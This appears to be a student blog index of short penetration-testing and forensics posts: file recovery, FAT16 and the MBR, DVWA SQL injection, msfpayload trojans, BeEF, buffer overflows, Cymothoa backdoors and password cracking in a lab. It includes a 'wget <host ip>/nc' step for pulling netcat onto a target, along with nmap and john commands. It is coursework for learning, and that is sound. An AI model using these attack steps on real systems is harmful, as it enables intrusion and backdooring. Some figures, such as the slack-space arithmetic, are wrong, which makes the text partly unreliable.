Recovery practical.floppy.dd

in this time i try to recovered file,

 

file in advance dd

Magic Number

the term magic number has multiple meanings. It could refer to one or more of the following:

• A constant numerical or text value used to identify a file format or protocol; for files, see List of file signatures
• Distinctive unique values that are unlikely to be mistaken for other meanings (e.g., Globally Unique Identifiers)
• Unique values with unexplained meaning or multiple occurrences which could (preferably) be replaced with named constants

Tipe File

I try to discuss CDR type file, what is CDR? CDR is type file from Corel Draw, if we drawing used Corel Draw then the file CDR extension.

Detail information for CDR file extensions :

primary association       : Corel

company                           : Corel Corporation

file classification             : Graphic

mime types                     : application / cdr, application / coreldraw, application / x-cdr, application / x-coreldraw, picture / cdr, image / x-cdr, zz-application/zz-winassoc-cdr

identify the hex character     : 52 49 46 46, ASCII: RIFF

ID program    : CDraw4, CorelDRAW.Graphic.8, CorelDRAW.Graphic.9, CorelDRAW.Graphic.10, CorelDRAW.Graphic.11

Unallocated Space

Unallocated Space is available disk space that is not allocated to any volume. The type of volume that you can create on unallocated space depends on the disk type. On basic disks, you can use unallocated space to create primary or extended partitions. On dynamic disks, you can use unallocated space to create dynamic volumes

Slack Space

Slack space or sometimes referred to as file slack is the area between the end of a file and end of the last cluster or sector used by the file in question. Area is an area that will not be used again to store the information there, so the area is "wasted" useless. Slack space is common in file systems that use a large cluster size, while the file system that uses a small cluster size can organize the storage media more effectively and efficiently. Amount of wasted disk space can be thought is estimated by multiplying the number of files (including the number of directories) with half the size of a cluster. For example, a 10 000 personal computer that stores files in a file system that uses a cluster size of 4 kilobytes will have approximately 10 000 x 2 MB ~ = 20000 KB. On a large file server, slack space and even reached the size of tens of gigabytes.

struktur filesystem

FAT16

file system that uses the allocation unit that has a limit of up to 16-bit, so it can store up to 216 units of allocation (65536 pieces). This file system has a capacity limit of up to 4 Gigabyte sizes only. Allocation unit size used by the FAT16 partition depends on the capacity that was about to be formatted: if the partition size is less than 16 megabytes, then Windows will use the FAT12 file system, and if the partition size larger than 16 megabytes, then Windows will use the FAT16 file system. The following table contains information any operating system that supports the FAT16 file system.

MBR (Master Boot Record)

master boot record (MBR) is a type of boot sector popularized by the IBM Personal Computer. It consists of a sequence of 512 bytes located at the first sector of a data storage device such as a hard disk. MBRs are usually placed on storage devices intended for use with IBM PC-compatible systems.

The MBR may be used for one or more of the following:

Exploit DVWA with SQL Injection

in this time backtrack a victim, at DVWA with medium security,

MSFPAYLOAD and MSFENCODE, example to used

msfpayload and msfencode used to make such false applications that we transfer to the victim computer to victim computer when accessing the application, the victim computer directly connected to a computer attacker. but the attacker computer must be in a position listening or ready position

example to used msfpayload and msfencode

at the picture i make false notepad.exe, where this file will send to computer victim

Combine Browser and Metasploit

in this time, i try to combine browser and metasploit to exploit victim.

using beef, copy the java script to web that we put as bait to the victim computer to victim computer can be connected to our computer

File exploit and Web exploit

The first computer I had to exploit the first victim, do information gathering and do exploitable 


with file exploit

Auxiliary using metasploit

search the auxiliary module with command show auxiliary at msfconsole

after that choose one of module auxiliary and to knowing set setting used command show options

after that setting the set RHOST and RPORT

and exploit

Social Engineering

Social engineering is the acquisition of information, or edicts, secret / sensitive by cheating the owner of such information. Social engineering is typically done via telephone or Internet. Social engineering is one of the methods used by hackers to gain information about the target, by requesting the information directly to the victim or others who have that information.

Social engineering concentrates on the weakest chain of computer network systems, namely humans. As we know, no computer system that does not involve human interaction. And worse, this vulnerability is universal, independent of platforms, operating systems, protocols, software or hardware. That is, each system has the same weakness in human factors. Any person who has physical access to the system is a threat, even if the person is not included in the security policy that had been developed. Other methods such as hacking, social engineering also requires preparation, even most of the work includes the preparation itself.

MSFPALOAD

exploit linux stack overflow

in this time, try to exploit linux, first must turn off the aslr

SEH Exploit Easy Chat Server Buffer Overflow method

This is a display from Easy Chat Server

Buffer Overflow BigAnt SEH

what is BigAnt??
BigAnt is instant messenger that features a 128bit encrypted messages and send files, clearly structured on-line list of users, and easier to use. BigAnt used on client computers with server computers.

Buffer Overflow VUplayer

VUPlayer

Buffer Overflow RM-MP3 Converter

in this time, i try exploit RM-MP3 converter with buffer overflow method,

prepare file which will be used as a tool to buffer overflow,

warftp with buffer overflow method

I try to exploit WARFTPD with fuzzing method.

in repair

exploit warftp

 in this time i try to exlpoit warftp
first we must search the informatioan gathering about warftp, i search using nessus

OllyDbg and installation

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries.

OllyDbg is often used for reverse engineering of programs. It is often used by crackers to crack software made by other developers. For cracking and reverse engineering, it is often the primary tool because of its ease of use and availability. It is also useful for programmers to ensure that their program is running as intended.

fuzzer and fuzzing

Fuzzer is called  to application used at fuzzing process. And fuzzing is process or method used to find out a logic error and failure in a data processing applications by providing an abnormal input into an application and see the same practice and learn how to handle the exception that there.

A fuzzer basically works by sending data simultaneously and repeatedly either automatically or semi-automatic into a software for processing. Data which is input data which is usually not normal, but the data that are made specifically, such as using special characters or has the number / length of data that is not normal.

Register Memory

Register memory is memory size very small but have very high-speed access. Register used to save data instructions are being processed, while the other data and other instructions waiting to processed are in main memory.

Tugas 8

download

By Pass FBIP

open the FBIP "localhost/fbip"

MKFIFO

The function "mkfifo" can be used to create a named pipe from within a program. The signature of the function is as follows:

int mkfifo(const char *path, mode_t mode)

The mkfifo function takes the path of the file and the mode (permissions) with which the file should be created. It creates the new named pipe file as specified by the path.
The function call assumes the O_CREATE|O_EXCL flags, that is, it creates a new named pipe or returns an error of EEXIST if the named pipe already exists. The named pipe's owner ID is set to the process' effective user ID, and its group ID is set to the process' effective group ID, or if the S_ISGID bit is set in the parent directory, the group ID of the named pipe is inherited from the parent directory.

Maltego

Maltego is platform to give information what we want to know about the target, can shaped infrastructure and personal, infrastructure and persona.

Maltego is a program that can be used to determine the relationships and real world links between:

• People

• Groups of people (social networks)

• Companies

• Organizations

• Web sites

• Internet infrastructure such as:

About Shodanhq

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
Shodan also lets you use boolean operators (‘+’, ‘-’ and ‘|’) to include/ exclude certain terms. By default, every search term has a ‘+’ operator assigned to it.
In addition to boolean operators, there are special filters to narrow down the search results.

exploitation DVWA with SQL Ijection

first the DVWA security set at low

and than choose SQL Injection and try input user id example '1' and submit, will display an error

Revisi NC

in here i doing rectification about NC
place the file nc in the folder www 

download in target system, with command "wget <host ip>/nc"

Cymothoa

i try to using cymothoa
enter to cymothoa, write "cd /pentest/backdoors/cymothoa/"

crack shadow with john the ripper

to crack with john, find the file password location, with command "./john -i pass (press tab)"

and then execute the file with command "./john -i pass3.txt", and will display

and the error result

Privilege Escalation

At this time, i try to crack IP address 192.168.0.21, before crack it we must find the information, result from information we find the loopholes for cracking
in here i use nessus to find the target information

ExploitDb

exploitdb use for local host, open the exploitdb

search vulnerability with Nessus

find vulnerability the target with nessus, open the nessus, click scan --> add, will display likes under this, and than input the stuffing, and click launch scan

Metasploit Windows in Backtrack 5

at this time i'm discuss about metasploit windows

1. we scan ip address connect with we computer, for detected i used nmap to searching IP addres, if we used nmap write "nmap 192.168.56.0/24", and than we will get IP addres to attack, in here the IP is 192.168.56.10

information gathering

In the second meet, I’m study about Information Gathering. I try to searching the information in the network 192.168.0.0, and this is the result

Computer with address 192.168.0.21

Nmap scan report for 192.168.0.21

Host is up (0.00076s latency).

Not shown: 995 closed ports

PORT      STATE SERVICE

22/tcp    open  ssh

80/tcp    open  http

139/tcp   open  netbios-ssn

445/tcp   open  microsoft-ds

10000/tcp open  snet-sensor-mgmt

MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)

Instal VirtualBox

For friends don’t know how to instal Windows and Ubuntu VirtualBox in Backtrack, I will show the tutorial for you.

How to instal Windows VirtualBox

1. click application launcher menu, in the left under corner the Desktop, choose system then click Oracle VM VirtualBox(Virtual Machine), so will appear display likes under this so click button New, and click Next: